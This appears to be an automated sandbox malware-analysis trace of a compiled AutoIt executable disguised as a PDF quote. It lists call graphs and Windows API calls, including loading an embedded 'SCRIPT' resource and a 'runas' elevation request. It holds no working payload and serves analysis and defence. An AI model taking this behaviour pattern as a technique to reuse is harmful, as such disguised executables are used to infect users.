InitializeCriticalSectionAndSpinCount __mtinitlocks 98955->99044 98957 e89c70 98958 e89c74 98957->98958 99046 e89f0a TlsAlloc 98957->99046 99045 e89cdc 61 API calls 2 library calls 98958->99045 98961 e89c79 98961->98922 98962 e89c86 98962->98958 98963 e89c91 98962->98963 99047 e88955 98963->99047 98966 e89cd3 99055 e89cdc 61 API calls 2 library calls 98966->99055 98969 e89cb2 98969->98966 98971 e89cb8 98969->98971 98970 e89cd8 98970->98922 99054 e89bb3 58 API calls 4 library calls 98971->99054 98973 e89cc0 GetCurrentThreadId 98973->98922 98975 e8d75e _doexit 98974->98975 98976 e89d8b __lock 58 API calls 98975->98976 98977 e8d765 98976->98977 98978 e88955 __calloc_crt 58 API calls 98977->98978 98979 e8d776 98978->98979 98980 e8d7e1 GetStartupInfoW 98979->98980 98981 e8d781 _doexit @_EH4_CallFilterFunc@8 98979->98981 98987 e8d7f6 98980->98987 98990 e8d925 98980->98990 98981->98926 98982 e8d9ed 99069 e8d9fd LeaveCriticalSection _doexit 98982->99069 98984 e88955 __calloc_crt 58 API calls 98984->98987 98985 e8d972 GetStdHandle 98985->98990 98986 e8d985 GetFileType 98986->98990 98987->98984 98989 e8d844 98987->98989 98987->98990 98988 e8d878 GetFileType 98988->98989 98989->98988 98989->98990 99067 e89fab InitializeCriticalSectionAndSpinCount 98989->99067 98990->98982 98990->98985 98990->98986 99068 e89fab InitializeCriticalSectionAndSpinCount 98990->99068 98994 e87e83 98993->98994 98995 e950b4 98993->98995 98999 e94c9b GetModuleFileNameW 98994->98999 99070 e8899d 58 API calls __malloc_crt 98995->99070 98997 e950f0 FreeEnvironmentStringsW 98997->98994 98998 e950da _memmove 98998->98997 99000 e94ccf _wparse_cmdline 98999->99000 99002 e94d0f _wparse_cmdline 99000->99002 99071 e8899d 58 API calls __malloc_crt 99000->99071 99002->98933 99004 e94ef1 __wsetenvp 99003->99004 99008 e94ee9 99003->99008 99005 e88955 __calloc_crt 58 API calls 99004->99005 99013 e94f1a __wsetenvp 99005->99013 99006 e94f71 99007 e82ed5 _free 58 API calls 99006->99007 99007->99008 99008->98937 99009 e88955 __calloc_crt 58 API calls 99009->99013 99010 e94f96 99012 e82ed5 _free 58 API calls 99010->99012 99012->99008 99013->99006 99013->99008 99013->99009 99013->99010 99014 e94fad 99013->99014 99072 e94787 58 API calls __wcsnicmp 99013->99072 99073 e88f46 IsProcessorFeaturePresent 99014->99073 99016 e94fb9 99016->98937 99019 e8327b __IsNonwritableInCurrentImage 99017->99019 99088 e8a651 99019->99088 99020 e83299 __initterm_e 99021 e82ec0 __cinit 67 API calls 99020->99021 99022 e832b8 _doexit __IsNonwritableInCurrentImage 99020->99022 99021->99022 99022->98941 99024 e649e7 99023->99024 99025 e64948 99023->99025 99024->98945 99026 e64982 IsThemeActive 99025->99026 99091 e834ec 99026->99091 99030 e649ae 99103 e64a5b SystemParametersInfoW SystemParametersInfoW 99030->99103 99032 e649ba 99104 e63b4c 99032->99104 99034 e649c2 SystemParametersInfoW 99034->99024 99035->98919 99036->98923 99037->98931 99041->98946 99042->98949 99043->98955 99044->98957 99045->98961 99046->98962 99049 e8895c 99047->99049 99050 e88997 99049->99050 99051 e8897a 99049->99051 99056 e95376 99049->99056 99050->98966 99053 e89f66 TlsSetValue 99050->99053 99051->99049 99051->99050 99064 e8a2b2 Sleep 99051->99064 99053->98969 99054->98973 99055->98970 99057 e95381 99056->99057 99061 e9539c 99056->99061 99058 e9538d 99057->99058 99057->99061 99065 e88ca8 58 API calls __getptd_noexit 99058->99065 99060 e953ac HeapAlloc 99060->99061 99062 e95392 99060->99062 99061->99060 99061->99062 99066 e83521 DecodePointer 99061->99066 99062->99049 99064->99051 99065->99062 99066->99061 99067->98989 99068->98990 99069->98981 99070->98998 99071->99002 99072->99013 99074 e88f51 99073->99074 99079 e88dd9 99074->99079 99078 e88f6c 99078->99016 99080 e88df3 _memset __call_reportfault 99079->99080 99081 e88e13 IsDebuggerPresent 99080->99081 99087 e8a2d5 SetUnhandledExceptionFilter UnhandledExceptionFilter 99081->99087 99083 e88ed7 __call_reportfault 99084 e8c776 __atodbl_l 6 API calls 99083->99084 99085 e88efa 99084->99085 99086 e8a2c0 GetCurrentProcess TerminateProcess 99085->99086 99086->99078 99087->99083 99089 e8a654 EncodePointer 99088->99089 99089->99089 99090 e8a66e 99089->99090 99090->99020 99092 e89d8b __lock 58 API calls 99091->99092 99093 e834f7 DecodePointer EncodePointer 99092->99093 99156 e89ef5 LeaveCriticalSection 99093->99156 99095 e649a7 99096 e83554 99095->99096 99097 e83578 99096->99097 99098 e8355e 99096->99098 99097->99030 99098->99097 99157 e88ca8 58 API calls __getptd_noexit 99098->99157 99100 e83568 99158 e88f36 9 API calls __wcsnicmp 99100->99158 99102 e83573 99102->99030 99103->99032 99105 e63b59 __write_nolock 99104->99105 99106 e677c7 59 API calls 99105->99106 99107 e63b63 GetCurrentDirectoryW 99106->99107 99159 e63778 99107->99159 99109 e63b8c IsDebuggerPresent 99110 e9d3dd MessageBoxA 99109->99110 99111 e63b9a 99109->99111 99114 e9d3f7 99110->99114 99112 e63c73 99111->99112 99111->99114 99115 e63bb7 99111->99115 99113 e63c7a SetCurrentDirectoryW 99112->99113 99116 e63c87 Mailbox 99113->99116 99281 e67373 59 API calls Mailbox 99114->99281 99240 e673e5 99115->99240 99116->99034 99120 e63bd5 GetFullPathNameW 99121 e67d2c 59 API calls 99120->99121 99123 e63c10 99121->99123 99122 e9d407 99124 e9d41d SetCurrentDirectoryW 99122->99124 99256 e70a8d 99123->99256 99124->99116 99127 e63c2e 99128 e63c38 99127->99128 99282 ec4a08 AllocateAndInitializeSid CheckTokenMembership FreeSid 99127->99282 99272 e63a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 99128->99272 99131 e9d43a 99131->99128 99134 e9d44b 99131->99134 99136 e64864 61 API calls 99134->99136 99135 e63c42 99137 e63c55 99135->99137 99139 e643db 68 API calls 99135->99139 99138 e9d453 99136->99138 99140 e70b30 341 API calls 99137->99140 99141 e67f41 59 API calls 99138->99141 99139->99137 99142 e63c60 99140->99142 99143 e9d460 99141->99143 99142->99112 99144 e9d46a 99143->99144 99145 e9d48f 99143->99145 99147 e67e0b 59 API calls 99144->99147 99148 e67e0b 59 API calls 99145->99148 99150 e9d475 99147->99150 99149 e9d48b GetForegroundWindow ShellExecuteW 99148->99149 99156->99095 99157->99100 99158->99102 99160 e677c7 59 API calls 99159->99160 99161 e6378e 99160->99161 99283 e63d43 99161->99283 99163 e637ac 99164 e64864 61 API calls 99163->99164 99165 e637c0 99164->99165 99166 e67f41 59 API calls 99165->99166 99167 e637cd 99166->99167 99168 e64f3d 136 API calls 99167->99168 99169 e637e6 99168->99169 99170 e9d2de 99169->99170 99171 e637ee Mailbox 99169->99171 99325 ec9604 99170->99325 99175 e681a7 59 API calls 99171->99175 99174 e9d2fd 99177 e82ed5 _free 58 API calls 99174->99177 99178 e63801 99175->99178 99176 e64faa 84 API calls 99176->99174 99180 e9d30a 99177->99180 99297 e693ea 99178->99297 99181 e64faa 84 API calls 99180->99181 99183 e9d313 99181->99183 99187 e63ee2 59 API calls 99183->99187 99184 e67f41 59 API calls 99185 e6381a 99184->99185 99186 e68620 69 API calls 99185->99186 99188 e6382c Mailbox 99186->99188 99189 e9d32e 99187->99189 99190 e67f41 59 API calls 99188->99190 99191 e63ee2 59 API calls 99189->99191 99192 e63852 99190->99192 99193 e9d34a 99191->99193 99194 e68620 69 API calls 99192->99194 99195 e64864 61 API calls 99193->99195 99197 e63861 Mailbox 99194->99197 99196 e9d36f 99195->99196 99198 e63ee2 59 API calls 99196->99198 99199 e677c7 59 API calls 99197->99199 99200 e9d37b 99198->99200 99202 e6387f 99199->99202 99201 e681a7 59 API calls 99200->99201 99203 e9d389 99201->99203 99300 e63ee2 99202->99300 99205 e63ee2 59 API calls 99203->99205 99207 e9d398 99205->99207 99213 e681a7 59 API calls 99207->99213 99209 e63899 99209->99183 99210 e638a3 99209->99210 99211 e8307d _W_store_winword 60 API calls 99210->99211 99212 e638ae 99211->99212 99212->99189 99214 e638b8 99212->99214 99215 e9d3ba 99213->99215 99216 e8307d _W_store_winword 60 API calls 99214->99216 99217 e63ee2 59 API calls 99215->99217 99218 e638c3 99216->99218 99219 e9d3c7 99217->99219 99218->99193 99220 e638cd 99218->99220 99219->99219 99221 e8307d _W_store_winword 60 API calls 99220->99221 99222 e638d8 99221->99222 99222->99207 99223 e63919 99222->99223 99225 e63ee2 59 API calls 99222->99225 99223->99207 99224 e63926 99223->99224 99227 e6942e 59 API calls 99224->99227 99226 e638fc 99225->99226 99228 e681a7 59 API calls 99226->99228 99229 e63936 99227->99229 99230 e6390a 99228->99230 99231 e691b0 59 API calls 99229->99231 99232 e63ee2 59 API calls 99230->99232 99233 e63944 99231->99233 99232->99223 99316 e69040 99233->99316 99235 e693ea 59 API calls 99237 e63961 99235->99237 99236 e69040 60 API calls 99236->99237 99237->99235 99237->99236 99238 e63ee2 59 API calls 99237->99238 99239 e639a7 Mailbox 99237->99239 99238->99237 99239->99109 99241 e673f2 __write_nolock 99240->99241 99242 e9ed7b _memset 99241->99242 99243 e6740b 99241->99243 99245 e9ed97 GetOpenFileNameW 99242->99245 99244 e648ae 60 API calls 99243->99244 99246 e67414 99244->99246 99247 e9ede6 99245->99247 99368 e80911 99246->99368 99250 e67d2c 59 API calls 99247->99250 99252 e9edfb 99250->99252 99252->99252 99253 e67429 99386 e669ca 99253->99386 99257 e70a9a __write_nolock 99256->99257 99571 e66ee0 99257->99571 99259 e70a9f 99271 e63c26 99259->99271 99582 e712fe 89 API calls 99259->99582 99261 e70aac 99261->99271 99583 e74047 91 API calls Mailbox 99261->99583 99263 e70ab5 99264 e70ab9 GetFullPathNameW 99263->99264 99263->99271 99265 e67d2c 59 API calls 99264->99265 99266 e70ae5 99265->99266 99267 e67d2c 59 API calls 99266->99267 99268 e70af2 99267->99268 99269 ea5004 _wcscat 99268->99269 99270 e67d2c 59 API calls 99268->99270 99270->99271 99271->99122 99271->99127 99273 e63ac2 LoadImageW RegisterClassExW 99272->99273 99274 e9d3cc 99272->99274 99586 e63041 7 API calls 99273->99586 99587 e648fe LoadImageW EnumResourceNamesW 99274->99587 99277 e63b46 99279 e639e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 99277->99279 99278 e9d3d5 99279->99135 99281->99122 99282->99131 99284 e63d50 __write_nolock 99283->99284 99285 e67d2c 59 API calls 99284->99285 99292 e63eb6 Mailbox 99284->99292 99287 e63d82 99285->99287 99286 e67b52 59 API calls 99286->99287 99287->99286 99289 e63db8 Mailbox 99287->99289 99288 e67b52 59 API calls 99288->99289 99289->99288 99291 e63e89 99289->99291 99289->99292 99293 e67f41 59 API calls 99289->99293 99296 e63f84 59 API calls 99289->99296 99290 e67f41 59 API calls 99294 e63eaa 99290->99294 99291->99290 99291->99292 99292->99163 99293->99289 99295 e63f84 59 API calls 99294->99295 99295->99292 99296->99289 99298 e80f36 Mailbox 59 API calls 99297->99298 99299 e6380d 99298->99299 99299->99184 99301 e63f05 99300->99301 99302 e63eec 99300->99302 99303 e67d2c 59 API calls 99301->99303 99304 e681a7 59 API calls 99302->99304 99305 e6388b 99303->99305 99304->99305 99306 e8307d 99305->99306 99307 e83089 99306->99307 99308 e830fe 99306->99308 99315 e830ae 99307->99315 99360 e88ca8 58 API calls __getptd_noexit 99307->99360 99362 e83110 60 API calls 3 library calls 99308->99362 99311 e8310b 99311->99209 99312 e83095 99361 e88f36 9 API calls __wcsnicmp 99312->99361 99314 e830a0 99314->99209 99315->99209 99317 e9f4d5 99316->99317 99320 e69057 99316->99320 99317->99320 99364 e68d3b 59 API calls Mailbox 99317->99364 99319 e6915f 99319->99237 99320->99319 99321 e691a0 99320->99321 99322 e69158 99320->99322 99363 e69e9c 60 API calls Mailbox 99321->99363 99324 e80f36 Mailbox 59 API calls 99322->99324 99324->99319 99326 e65045 85 API calls 99325->99326 99327 ec9673 99326->99327 99365 ec97dd 96 API calls 2 library calls 99327->99365 99329 ec9685 99330 e6506b 74 API calls 99329->99330 99356 e9d2f1 99329->99356 99331 ec96a0 99330->99331 99332 e6506b 74 API calls 99331->99332 99333 ec96b0 99332->99333 99334 e6506b 74 API calls 99333->99334 99335 ec96cb 99334->99335 99336 e6506b 74 API calls 99335->99336 99337 ec96e6 99336->99337 99338 e65045 85 API calls 99337->99338 99339 ec96fd 99338->99339 99340 e8588c __malloc_crt 58 API calls 99339->99340 99341 ec9704 99340->99341 99342 e8588c __malloc_crt 58 API calls 99341->99342 99343 ec970e 99342->99343 99344 e6506b 74 API calls 99343->99344 99345 ec9722 99344->99345 99366 ec91b2 GetSystemTimeAsFileTime 99345->99366 99347 ec9735 99348 ec975f 99347->99348 99349 ec974a 99347->99349 99351 ec97c4 99348->99351 99352 ec9765 99348->99352 99350 e82ed5 _free 58 API calls 99349->99350 99354 ec9750 99350->99354 99353 e82ed5 _free 58 API calls 99351->99353 99367 ec8baf 116 API calls __fcloseall 99352->99367 99353->99356 99357 e82ed5 _free 58 API calls 99354->99357 99356->99174 99356->99176 99357->99356 99358 ec97bc 99359 e82ed5 _free 58 API calls 99358->99359 99359->99356 99360->99312 99361->99314 99362->99311 99363->99319 99364->99320 99365->99329 99366->99347 99367->99358 99369 e91ac0 __write_nolock 99368->99369 99370 e8091e GetLongPathNameW 99369->99370 99371 e67d2c 59 API calls 99370->99371 99372 e6741d 99371->99372 99373 e6716b 99372->99373 99374 e677c7 59 API calls 99373->99374 99375 e6717d 99374->99375 99376 e648ae 60 API calls 99375->99376 99377 e67188 99376->99377 99378 e67193 99377->99378 99384 e9ebde 99377->99384 99379 e63f84 59 API calls 99378->99379 99381 e6719f 99379->99381 99420 e634c2 99381->99420 99383 e9ebf8 99384->99383 99426 e67a68 61 API calls 99384->99426 99385 e671b2 Mailbox 99385->99253 99387 e64f3d 136 API calls 99386->99387 99388 e669ef 99387->99388 99389 e9e38a 99388->99389 99391 e64f3d 136 API calls 99388->99391 99390 ec9604 122 API calls 99389->99390 99392 e9e39f 99390->99392 99393 e66a03 99391->99393 99394 e9e3c0 99392->99394 99395 e9e3a3 99392->99395 99393->99389 99396 e66a0b 99393->99396 99398 e80f36 Mailbox 59 API calls 99394->99398 99397 e64faa 84 API calls 99395->99397 99399 e66a17 99396->99399 99400 e9e3ab 99396->99400 99397->99400 99409 e9e405 Mailbox 99398->99409 99427 e66bec 99399->99427 99533 ec4339 90 API calls _wprintf 99400->99533 99404 e9e3b9 99404->99394 99405 e9e5b9 99406 e82ed5 _free 58 API calls 99405->99406 99407 e9e5c1 99406->99407 99408 e64faa 84 API calls 99407->99408 99414 e9e5ca 99408->99414 99409->99405 99409->99414 99417 e67f41 59 API calls 99409->99417 99519 e6766f 99409->99519 99527 e674bd 99409->99527 99534 ebfa6e 59 API calls 2 library calls 99409->99534 99535 ebf98f 61 API calls 2 library calls 99409->99535 99536 ec7428 59 API calls Mailbox 99409->99536 99413 e82ed5 _free 58 API calls 99413->99414 99414->99413 99415 e64faa 84 API calls 99414->99415 99537 ebfad2 89 API calls 4 library calls 99414->99537 99415->99414 99417->99409 99421 e634d4 99420->99421 99425 e634f3 _memmove 99420->99425 99424 e80f36 Mailbox 59 API calls 99421->99424 99422 e80f36 Mailbox 59 API calls 99423 e6350a 99422->99423 99423->99385 99424->99425 99425->99422 99426->99384 99428 e66c15 99427->99428 99429 e9e777 99427->99429 99543 e65906 60 API calls Mailbox 99428->99543 99559 ebfad2 89 API calls 4 library calls 99429->99559 99432 e66c37 99544 e65956 67 API calls 99432->99544 99433 e9e78a 99560 ebfad2 89 API calls 4 library calls 99433->99560 99435 e66c4c 99435->99433 99436 e66c54 99435->99436 99438 e677c7 59 API calls 99436->99438 99440 e66c60 99438->99440 99439 e9e7a6 99442 e66cc1 99439->99442 99545 e80ad7 60 API calls __write_nolock 99440->99545 99444 e9e7b9 99442->99444 99445 e66ccf 99442->99445 99443 e66c6c 99447 e677c7 59 API calls 99443->99447 99448 e65dcf CloseHandle 99444->99448 99446 e677c7 59 API calls 99445->99446 99450 e66cd8 99446->99450 99451 e66c78 99447->99451 99449 e9e7c5 99448->99449 99452 e64f3d 136 API calls 99449->99452 99453 e677c7 59 API calls 99450->99453 99454 e648ae 60 API calls 99451->99454 99455 e9e7e1 99452->99455 99456 e66ce1 99453->99456 99457 e66c86 99454->99457 99458 e9e80a 99455->99458 99461 ec9604 122 API calls 99455->99461 99459 e646f9 59 API calls 99456->99459 99546 e659b0 ReadFile SetFilePointerEx 99457->99546 99561 ebfad2 89 API calls 4 library calls 99458->99561 99462 e66cf8 99459->99462 99465 e9e7fd 99461->99465 99466 e67c8e 59 API calls 99462->99466 99464 e66cb2 99547 e65c4e SetFilePointerEx SetFilePointerEx 99464->99547 99468 e9e805 99465->99468 99469 e9e826 99465->99469 99470 e66d09 SetCurrentDirectoryW 99466->99470 99471 e64faa 84 API calls 99468->99471 99472 e64faa 84 API calls 99469->99472 99476 e66d1c Mailbox 99470->99476 99471->99458 99474 e9e82b 99472->99474 99473 e66e6c Mailbox 99538 e65934 99473->99538 99475 e80f36 Mailbox 59 API calls 99474->99475 99479 e9e85f 99475->99479 99478 e80f36 Mailbox 59 API calls 99476->99478 99481 e66d2f 99478->99481 99483 e6766f 59 API calls 99479->99483 99480 e63bcd 99480->99112 99480->99120 99482 e6538e 59 API calls 99481->99482 99508 e66d3a Mailbox __wsetenvp 99482->99508 99514 e9e8a8 Mailbox 99483->99514 99484 e66e47 99555 e65dcf 99484->99555 99487 e9ea99 99566 ec7388 59 API calls Mailbox 99487->99566 99488 e66e53 SetCurrentDirectoryW 99488->99473 99491 e9eabb 99567 ecf656 59 API calls 2 library calls 99491->99567 99494 e9eac8 99496 e82ed5 _free 58 API calls 99494->99496 99495 e9eb32 99570 ebfad2 89 API calls 4 library calls 99495->99570 99496->99473 99499 e9eb4b 99499->99484 99500 e6766f 59 API calls 99500->99514 99502 e9eb2a 99569 ebf928 59 API calls 4 library calls 99502->99569 99504 e67f41 59 API calls 99504->99508 99508->99484 99508->99495 99508->99502 99508->99504 99548 e659cd 67 API calls _wcscpy 99508->99548 99549 e670bd GetStringTypeW 99508->99549 99550 e6702c 60 API calls __wcsnicmp 99508->99550 99551 e6710a GetStringTypeW __wsetenvp 99508->99551 99552 e837bd GetStringTypeW _iswctype 99508->99552 99553 e66a3c 165 API calls 3 library calls 99508->99553 99554 e67373 59 API calls Mailbox 99508->99554 99509 e67f41 59 API calls 99509->99514 99512 e9eaeb 99568 ebfad2 89 API calls 4 library calls 99512->99568 99514->99487 99514->99500 99514->99509 99514->99512 99562 ebfa6e 59 API calls 2 library calls 99514->99562 99563 ebf98f 61 API calls 2 library calls 99514->99563 99564 ec7428 59 API calls Mailbox 99514->99564 99565 e67373 59 API calls Mailbox 99514->99565 99516 e9eb04 99517 e82ed5 _free 58 API calls 99516->99517 99518 e9e821 99517->99518 99518->99473 99520 e6770f 99519->99520 99524 e67682 _memmove 99519->99524 99522 e80f36 Mailbox 59 API calls 99520->99522 99521 e80f36 Mailbox 59 API calls 99523 e67689 99521->99523 99522->99524 99525 e80f36 Mailbox 59 API calls 99523->99525 99526 e676b2 99523->99526 99524->99521 99525->99526 99526->99409 99528 e674d0 99527->99528 99530 e6757e 99527->99530 99529 e80f36 Mailbox 59 API calls 99528->99529 99532 e67502 99528->99532 99529->99532 99530->99409 99531 e80f36 59 API calls Mailbox 99531->99532 99532->99530 99532->99531 99533->99404 99534->99409 99535->99409 99536->99409 99537->99414 99539 e65dcf CloseHandle 99538->99539 99540 e6593c Mailbox 99539->99540 99541 e65dcf CloseHandle 99540->99541 99542 e6594b 99541->99542 99542->99480 99543->99432 99544->99435 99545->99443 99546->99464 99547->99442 99548->99508 99549->99508 99550->99508 99551->99508 99552->99508 99553->99508 99554->99508 99556 e65de8 99555->99556 99557 e65dd9 99555->99557 99556->99557 99558 e65ded CloseHandle 99556->99558 99557->99488 99558->99557 99559->99433 99560->99439 99561->99518 99562->99514 99563->99514 99564->99514 99565->99514 99566->99491 99567->99494 99568->99516 99569->99495 99570->99499 99572 e66ef5 99571->99572 99577 e67009 99571->99577 99573 e80f36 Mailbox 59 API calls 99572->99573 99572->99577 99575 e66f1c 99573->99575 99574 e80f36 Mailbox 59 API calls 99576 e66f91 99574->99576 99575->99574 99576->99577 99580 e674bd 59 API calls 99576->99580 99581 e6766f 59 API calls 99576->99581 99584 e663a0 94 API calls 2 library calls 99576->99584 99585 eb68a9 59 API calls Mailbox 99576->99585 99577->99259 99580->99576 99581->99576 99582->99261 99583->99263 99584->99576 99585->99576 99586->99277 99587->99278 99588 ea0155 99595 e6ae4f Mailbox 99588->99595 99589 e6b6d1 99627 ec9ed4 89 API calls 4 library calls 99589->99627 99591 ea0bb5 99628 eb63f2 59 API calls Mailbox 99591->99628 99593 ea0bbe 99595->99589 99595->99591 99595->99593 99597 ee2343 99595->99597 99626 e69df0 59 API calls Mailbox 99595->99626 99598 e69997 84 API calls 99597->99598 99599 ee235d 99598->99599 99600 e67b76 59 API calls 99599->99600 99601 ee236c 99600->99601 99602 ee239a 99601->99602 99647 e69c9c 59 API calls 99601->99647 99603 e75bfd 59 API calls 99602->99603 99605 ee23a3 99603->99605 99607 e67f41 59 API calls 99605->99607 99606 ee237d 99606->99602 99608 ee2382 99606->99608 99609 ee23b1 99607->99609 99610 e681a7 59 API calls 99608->99610 99629 e75c72 99609->99629 99625 ee238c Mailbox 99610->99625 99612 ee23c0 Mailbox 99638 e75d24 99612->99638 99615 ee2474 Mailbox 99615->99595 99617 e677c7 59 API calls 99620 ee23f2 99617->99620 99618 ee2429 99622 e67c8e 59 API calls 99618->99622 99623 ee2443 Mailbox 99618->99623 99620->99618 99621 e63f84 59 API calls 99620->99621 99641 eb6511 99620->99641 99621->99620 99622->99618 99648 e75c2e 99623->99648 99652 e69b9c 59 API calls Mailbox 99625->99652 99626->99595 99627->99591 99628->99593 99630 e75c2e 59 API calls 99629->99630 99631 e75c80 99630->99631 99637 e75c8f 99631->99637 99653 e76841 61 API calls 2 library calls 99631->99653 99633 e80f36 Mailbox 59 API calls 99634 e75cb9 99633->99634 99634->99612 99635 e75cdc 99635->99634 99654 e75d92 59 API calls Mailbox 99635->99654 99637->99633 99639 e681a7 59 API calls 99638->99639 99640 e75d32 99639->99640 99640->99617 99642 eb652a 99641->99642 99643 eb651c 99641->99643 99655 e678ad 99642->99655 99644 e67e8c 59 API calls 99643->99644 99645 eb6528 99644->99645 99645->99620 99647->99606 99649 e75c38 99648->99649 99650 e67eec 59 API calls 99649->99650 99651 e75c53 99650->99651 99651->99625 99652->99615 99653->99635 99654->99637 99656 e6792f 99655->99656 99657 e678bc 99655->99657 99658 e67e8c 59 API calls 99656->99658 99657->99656 99659 e678c8 99657->99659 99666 e678da _memmove 99658->99666 99660 e678d2 99659->99660 99661 e67900 99659->99661 99667 e68087 59 API calls Mailbox 99660->99667 99663 e68189 59 API calls 99661->99663 99664 e6790a 99663->99664 99665 e80f36 Mailbox 59 API calls 99664->99665 99665->99666 99666->99645 99667->99666

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E63B7A
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00E63B8C
                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F252F8,00F252E0,?,?), ref: 00E63BFD
                                                                      • Part of subcall function 00E67D2C: _memmove.LIBCMT ref: 00E67D66
                                                                      • Part of subcall function 00E70A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E63C26,00F252F8,?,?,?), ref: 00E70ACE
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E63C81
                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F17770,00000010), ref: 00E9D3EC
                                                                    • SetCurrentDirectoryW.KERNEL32(?,00F252F8,?,?,?), ref: 00E9D424
                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F14260,00F252F8,?,?,?), ref: 00E9D4AA
                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00E9D4B1
                                                                      • Part of subcall function 00E63A58: GetSysColorBrush.USER32(0000000F), ref: 00E63A62
                                                                      • Part of subcall function 00E63A58: LoadCursorW.USER32(00000000,00007F00), ref: 00E63A71
                                                                      • Part of subcall function 00E63A58: LoadIconW.USER32(00000063), ref: 00E63A88
                                                                      • Part of subcall function 00E63A58: LoadIconW.USER32(000000A4), ref: 00E63A9A
                                                                      • Part of subcall function 00E63A58: LoadIconW.USER32(000000A2), ref: 00E63AAC
                                                                      • Part of subcall function 00E63A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E63AD2
                                                                      • Part of subcall function 00E63A58: RegisterClassExW.USER32(?), ref: 00E63B28
                                                                      • Part of subcall function 00E639E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E63A15
                                                                      • Part of subcall function 00E639E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E63A36
                                                                      • Part of subcall function 00E639E7: ShowWindow.USER32(00000000,?,?), ref: 00E63A4A
                                                                      • Part of subcall function 00E639E7: ShowWindow.USER32(00000000,?,?), ref: 00E63A53
                                                                      • Part of subcall function 00E643DB: _memset.LIBCMT ref: 00E64401
                                                                      • Part of subcall function 00E643DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E644A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                    • String ID: This is a third-party compiled AutoIt script.$runas$%
                                                                    • API String ID: 529118366-3343222573
                                                                    • Opcode ID: e722479ef76d80c2b6d8e71046bc1e5312f34af7952d36689f0efa796892927f
                                                                    • Instruction ID: 38dc0a48dd9549c6ba7a5580e2b5a8c9f61735d07351e6ad31fd3ba2bd4cbb06
                                                                    • Opcode Fuzzy Hash: e722479ef76d80c2b6d8e71046bc1e5312f34af7952d36689f0efa796892927f
                                                                    • Instruction Fuzzy Hash: 8251093094825CEECF11EBB4FC45DFDBBB4AB44784F005169F461B61E2CA709646EB21

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 942 e64fe9-e65001 CreateStreamOnHGlobal 943 e65003-e6501a FindResourceExW 942->943 944 e65021-e65026 942->944 945 e9dc8c-e9dc9b LoadResource 943->945 946 e65020 943->946 945->946 947 e9dca1-e9dcaf SizeofResource 945->947 946->944 947->946 948 e9dcb5-e9dcc0 LockResource 947->948 948->946 949 e9dcc6-e9dce4 948->949 949->946
                                                                    APIs
                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00E64EEE,?,?,00000000,00000000), ref: 00E64FF9
                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E64EEE,?,?,00000000,00000000), ref: 00E65010
                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00E64EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E64F8F), ref: 00E9DC90
                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00E64EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E64F8F), ref: 00E9DCA5
                                                                    • LockResource.KERNEL32(N,?,?,00E64EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E64F8F,00000000), ref: 00E9DCB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                    • String ID: SCRIPT$N
                                                                    • API String ID: 3051347437-3852340653
